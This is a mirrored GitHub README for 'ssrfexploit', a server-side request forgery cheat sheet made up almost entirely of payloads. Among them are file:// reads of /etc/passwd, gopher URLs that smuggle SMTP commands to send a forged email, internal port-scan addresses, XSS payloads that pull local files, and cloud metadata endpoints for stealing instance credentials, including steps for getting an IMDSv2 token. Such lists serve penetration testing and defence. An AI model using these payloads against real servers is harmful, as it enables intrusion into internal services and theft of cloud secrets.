Giter Site home page Giter Site logo

ssrfexploit's Introduction

Extract metadata, XSS, XSPA, RCE & LFI with SSRF (Server-Side Request Forgery)

LFI (Local File Inclusion)

  • file:///etc/passwd
  • file:///c:/windows/win.ini

Other protocol

  • dict://<server>:11111/
  • sftp://<server>:11111/
  • tftp://<server>:12346/TESTUDPPACKET
  • ftp://<server>:12346/TESTUDPPACKET
  • ldap://localhost:11211/%0astats%0aquit
  • gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
  • gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
  • gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

Will make a request like :

HELO localhost
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
From: [Hacker] <[email protected]>
To: <[email protected]>
Date: Tue, 15 Sep 2017 17:20:26 -0400

Subject: Ah Ah Ah

You didn't say the magic word !


.
QUIT

RCE (Remote Code Execution)

XSPA (Cross Site Port Attack, Internal Port Scan)

  • http://localhost:<port>
  • http://127.0.0.1:<port>
  • http://192.168.0.1:<port>
  • http://0177.0.0.1:<port>
  • http://2130706433:<port>
  • http://3232235521:<port>
  • http://3232235777:<port>

XSS (Cross-Site Scripting)

  • http://<yourxsshunter>.xss.ht

Host a file with these payloads & request it:

  • <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
  • <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
  • <script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>
  • <img src onerror=document.write(navigator.appVersion)>
  • <img src onerror=document.write(navigator.appName)>
  • <img src onerror=document.write(navigator.platform)>
  • <img src onerror=document.write(navigator.userAgent)>
  • <img src onerror=document.write(navigator.plugins)>
  • <img src onerror=document.write(navigator.mimeTypes)>

Cloud metadata

AWS

From http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

ECS Task

From https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html

Other notations

Shortners

IPv6

  • http://[::ffff:169.254.169.254]
  • http://[0:0:0:0:0:ffff:169.254.169.254]

AWS - Dirs

IMDSv2

If you can make PUT request :

PUT request to http://169.254.169.254/latest/api/token with the custom header x-aws-ec2-metadata-token-ttl-seconds with the value of the number of seconds for which the token needs to be active. Put the extracted token to the header x-aws-ec2-metadata-token and try the requests above.

Google Cloud

From https://cloud.google.com/compute/docs/metadata

Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"

Google allows recursive pulls

Beta does NOT require a header atm

Returns root password for Google

Digital Ocean

From https://developers.digitalocean.com/documentation/metadata/

Packetcloud

https://metadata.packet.net/userdata

Azure

From https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service

From https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service

Requires the header "Metadata: true"

OpenStack/RackSpace

From https://docs.openstack.org/nova/latest/user/metadata-service.html

HP Helion

Oracle Cloud

From https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html

From https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm

Alibaba

From https://www.alibabacloud.com/help/faq-detail/49122.htm

Tencent Cloud

From https://intl.cloud.tencent.com/document/product/213/4934

Kubernetes

From https://kubernetes.io/docs/tasks/debug-application-cluster/debug-service

ssrfexploit's People

Contributors

akincibor avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar

Forkers

abd-4fg slowmistio 1337in nafisaqil evcuq4hggjd74lhz

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.